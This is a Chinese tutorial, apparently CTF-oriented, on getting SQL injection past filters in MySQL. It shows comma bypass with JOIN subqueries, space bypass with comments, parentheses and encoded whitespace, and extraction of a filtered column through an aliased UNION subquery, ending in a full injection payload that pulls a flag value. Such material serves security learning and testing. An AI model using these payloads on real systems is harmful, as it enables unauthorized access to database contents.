sql逗号,空格,字段名过滤突破
逗号被过滤
使用join 来进行绕过,使用联合查询
1 2 3 4 5 6 7 8 9 10 11 12 13 | mysql> select (select 1)a; +---+ | a | +---+ | 1 | +---+ mysql> select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ |
SQL join 用于根据两个或多个表中的列之间的关系,从这些表中查询数据。
这里(select 1)a相当于表,再通过join查询列的值。
需要查表所以要使用union select * from (select 1)a join (select 2)b …….
空格被过滤
使用注释绕过 /**/
1 2 3 4 5 6 | mysql> select id,username from admin/**/where id='1'; +----+----------+ | id | username | +----+----------+ | 1 | admin | +----+----------+ |
使用括号绕过
1 2 3 4 5 6 | mysql> select id,username from(admin)where id='1'; +----+----------+ | id | username | +----+----------+ | 1 | admin | +----+----------+ |
使用符号替代空格 %20 %09 %0d %0b %0c %0d %a0 %0a
对%0a进行绕过分析:%0a意为换行
1 2 3 4 5 6 7 8 9 10 11 | mysql> select -> id,username -> from -> admin -> where id = '1'; +----+----------+ | id | username | +----+----------+ | 1 | admin | +----+----------+ //select 这些后面都没有跟空格,而是直接换行 |
字段名被过滤
问题引入
1 2 3 4 5 6 7 | mysql> select * from users; +----+----------------+ | id | flag | +----+----------------+ | 1 | flag{you_good} | +----+----------------+ |
已爆出表名users,要查询flag的值,但是flag字段名被过滤。
常规方法:union select flag from users;
字段名被过滤后,不使用flag字段,但是要查出flag字段内容。
解决方案
首先
1 2 3 4 5 6 | mysql> select 1,2; +---+---+ | 1 | 2 | +---+---+ | 1 | 2 | +---+---+ |
使用联合查询,得到users表的内容
1 2 3 4 5 6 7 | mysql> select 1,2 union select * from users; +---+----------------+ | 1 | 2 | +---+----------------+ | 1 | 2 | | 1 | flag{you_good} | +---+----------------+ |
查询的结果是一张虚表,设置别名给这张表命名
1 2 3 4 5 6 7 | mysql> select * from (select 1,2 union select * from users)c; +---+----------------+ | 1 | 2 | +---+----------------+ | 1 | 2 | | 1 | flag{you_good} | +---+----------------+ |
提取flag字段的内容
1 2 3 4 5 6 | mysql> select c.2 from (select 1,2 union select * from users)c limit 1,2; +----------------+ | 2 | +----------------+ | flag{you_good} | +----------------+ |
实际应用:两张表:user(id,name,password),users(id,flag)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | mysql> select * from user where id ='1'; +----+-------+----------+ | id | name | password | +----+-------+----------+ | 1 | admin | admin123 | +----+-------+----------+ mysql> select * from user where id ='-1' union select 1,2,3; +----+------+----------+ | id | name | password | +----+------+----------+ | 1 | 2 | 3 | +----+------+----------+ mysql> select * from user where id ='-1' union select 1,2,(select c.2 from (select 1,2 union select * from users)c limit 1,2); +----+------+----------------+ | id | name | password | +----+------+----------------+ | 1 | 2 | flag{you_good} | +----+------+----------------+ |